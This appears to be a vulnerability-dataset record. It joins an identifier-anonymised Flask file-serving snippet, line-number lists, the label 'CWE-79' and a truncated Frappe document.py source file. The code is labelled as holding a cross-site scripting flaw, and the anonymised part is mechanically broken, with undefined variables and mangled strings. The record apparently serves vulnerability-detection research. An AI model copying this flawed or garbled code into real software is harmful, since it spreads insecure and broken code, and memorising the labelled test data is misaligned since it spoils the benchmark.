if len(VAR_30) > 2:
VAR_25 = float(VAR_30[2]) #float(VAR_30[2])/100.
return VAR_24, round(VAR_25, 4)
def FUNC_4(VAR_18, VAR_14=None):
VAR_32 = FUNC_11('GIDIDX' + VAR_18.upper())
VAR_33 = ('*.jpg', '*.JPG', '*.jpeg', '.png')
VAR_34 = []
if VAR_14:
classes.replace('%2C', ',')
VAR_14.replace('%20', ' ')
VAR_34 = VAR_14.split(',')
def FUNC_14():
with open(VAR_32, 'r') as f:
VAR_47 = f.readline()
VAR_47 = '/'.join(VAR_47.split('/')[:-2])
VAR_35 = []
for c in VAR_34:
VAR_35.append(FUNC_10(VAR_47+'/'+c.strip()))
return VAR_35
VAR_17 = []
VAR_35 = FUNC_14()
VAR_8.info("Class paths : {}".format(VAR_35))
if VAR_35:
for VAR_36 in VAR_35:
VAR_8.info("Path Exists ? {}".format(os.path.exists(VAR_36)))
sys.stdout.flush()
VAR_50 = []
for ext in VAR_33:
VAR_50.extend(glob.glob(os.path.join(VAR_36, ext)))
VAR_17.extend(sorted(VAR_50))
VAR_17 = [FUNC_9(l.strip()) for l in VAR_17]
else:
with open(VAR_32, 'r') as f:
VAR_17 = list(f.readlines())
return VAR_17
@VAR_7.route('/id/<VAR_36:VAR_19>')
def FUNC_5(VAR_19):
VAR_29 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_7(VAR_19=object_path),
"200 OK",
VAR_29=headers)
@VAR_7.route('/meta/<VAR_36:VAR_19>')
def FUNC_6(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_37 = dict()
try:
VAR_37['_gt_label'] = VAR_36.split('/')[-2]
except IOError:
pass
return jsonify(VAR_37)
def FUNC_7(VAR_19):
VAR_36 = FUNC_10(VAR_19)
VAR_38 = '/'.join(VAR_36.split('/')[:-2])+'/VAR_14.txt'
if os.path.isfile(VAR_38):
return '<object id={} src={} meta={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)),
quoteattr(url_for('.get_object_meta', VAR_19=object_path)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_19=object_path)),
quoteattr(FUNC_8(VAR_19)))
def FUNC_8(VAR_19):
if VAR_2:
return 'file://' + FUNC_10(VAR_19)
return url_for('.get_object_src_http', VAR_20=VAR_19)
def FUNC_9(VAR_20):
return VAR_20.replace(VAR_4+'/', '')
def FUNC_10(VAR_20):
return safe_join(VAR_4, VAR_20)
def FUNC_11(VAR_11):
return safe_join(VAR_3, VAR_11)
@VAR_7.route('/obj/<VAR_36:VAR_20>')
def FUNC_12(VAR_20):
VAR_36 = FUNC_10(VAR_20)
VAR_29 = Headers()
VAR_39 = send_file(VAR_36,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_39.headers.extend(VAR_29)
return VAR_39
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
29,
35,
43,
44,
49,
50,
52,
54,
66,
73,
75,
91,
92,
95,
96,
97,
98,
104,
105,
116,
117,
119,
126,
128,
129,
135,
136,
137,
139,
143,
145,
151,
153,
158,
163,
169,
171,
173,
177,
188,
193,
197,
201,
203,
209,
218,
222,
235,
237,
244,
245,
250,
255,
257,
258,
270,
271,
275,
277,
280,
283,
284,
287,
288,
292,
294,
295,
303,
190,
191,
192,
193,
194,
195,
196,
197,
198,
199
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
28,
30,
31,
37,
45,
46,
51,
52,
54,
56,
68,
75,
77,
93,
94,
97,
98,
99,
100,
106,
107,
118,
119,
121,
128,
130,
131,
137,
138,
139,
141,
145,
147,
153,
155,
160,
165,
171,
173,
175,
179,
190,
195,
199,
203,
205,
211,
220,
224,
237,
239,
246,
247,
252,
257,
259,
260,
272,
273,
277,
279,
282,
285,
286,
289,
290,
294,
296,
297,
305,
192,
193,
194,
195,
196,
197,
198,
199,
200,
201
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(f):
"""Decorator: Whitelist method to be called remotely via REST API."""
f.whitelisted = True
return f
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
def run_method(self, method, *args, **kwargs):
"""run standard triggers, plus those in hooks"""
if "flags" in kwargs:
del kwargs["flags"]
if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
else:
# hack! to run hooks even if method does not exist
fn = lambda self, *args, **kwargs: None
fn.__name__ = str(method)
out = Document.hook(fn)(self, *args, **kwargs)
self.run_notifications(method)
run_webhooks(self, method)
run_server_script_for_doc_event(self, method)
return out
def run_trigger(self, method, *args, **kwargs):
return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
@whitelist.__func__
def _submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self.docstatus = 1
self.save()
@whitelist.__func__
def _cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self.docstatus = 2
self.save()
@whitelist.__func__
def submit(self):
"""Submit the document. Sets `docstatus` = 1, then saves."""
self._submit()
@whitelist.__func__
def cancel(self):
"""Cancel the document. Sets `docstatus` = 2, then saves."""
self._cancel()
def delete(self, ignore_permissions=False):
"""Delete document."""
frappe.delete_doc(self.doctype, self.name, ignore_permissions = ignore_permissions, flags=self.flags)
def run_before_save_methods(self):
"""Run standard methods before `INSERT` or `UPDATE`. Standard Methods are:
- `validate`, `before_save` for **Save**.
- `validate`, `before_submit` for **Submit**.
- `before_cancel` for **Cancel**
- `before_update_after_submit` for **Update after Submit**
Will also update title_field if set"""
self.load_doc_before_save()
self.reset_seen()
# before_validate method should be executed before ignoring validations
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def load_doc_before_save(self):
"""Save load document from db before saving"""
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def run_post_save_methods(self):
"""Run standard methods after `INSERT` or `UPDATE`. Standard Methods are:
- `on_update` for **Save**.
- `on_update`, `on_submit` for **Submit**.
- `on_cancel` for **Cancel**
- `update_after_submit` for **Update after Submit**"""
doc_before_save = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def clear_cache(self):
frappe.clear_document_cache(self.doctype, self.name)
def reset_seen(self):
"""Clear _seen property and set current user as seen"""
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), update_modified=False)
def notify_update(self):
"""Publish realtime that the current document is modified"""
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
doctype=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
data = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", data, after_commit=True)
def db_set(self, fieldname, value=None, update_modified=True, notify=False, commit=False):
"""Set a value in the document object, update the timestamp and update the database.
WARNING: This method does not trigger controller validations and should
be used very carefully.
:param fieldname: fieldname of the property to be updated, or a {"field":"value"} dictionary
:param value: value of the property to be updated
:param update_modified: default True. updates the `modified` and `modified_by` properties
:param notify: default False. run doc.notify_updated() to send updates via socketio
:param commit: default False. run frappe.db.commit()
"""
if isinstance(fieldname, dict):
self.update(fieldname)
else:
self.set(fieldname, value)
if update_modified and (self.doctype, self.name) not in frappe.flags.currently_saving:
# don't update modified timestamp if called from post save methods
# like on_update or on_submit
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
# to trigger notification on value change
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, fieldname, value,
self.modified, self.modified_by, update_modified=update_modified)
self.run_method('on_change')
if notify:
self.notify_update()
self.clear_cache()
if commit:
frappe.db.commit()
def db_get(self, fieldname):
"""get database value for this fieldname"""
return frappe.db.get_value(self.doctype, self.name, fieldname)
def check_no_back_links_exist(self):
"""Check if document links to any active document before Cancel."""
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, method="Cancel")
check_if_doc_is_dynamically_linked(self, method="Cancel")
def save_version(self):
"""Save version info"""
# don't track version under following conditions
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
version = frappe.new_doc('Version')
if not self._doc_before_save:
version.for_insert(self)
version.insert(ignore_permissions=True)
elif version.set_diff(self._doc_before_save, self):
version.insert(ignore_permissions=True)
if not frappe.flags.in_migrate:
# follow since you made a change?
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def hook(f):
"""Decorator: Make method `hookable` (i.e. extensible by another app).
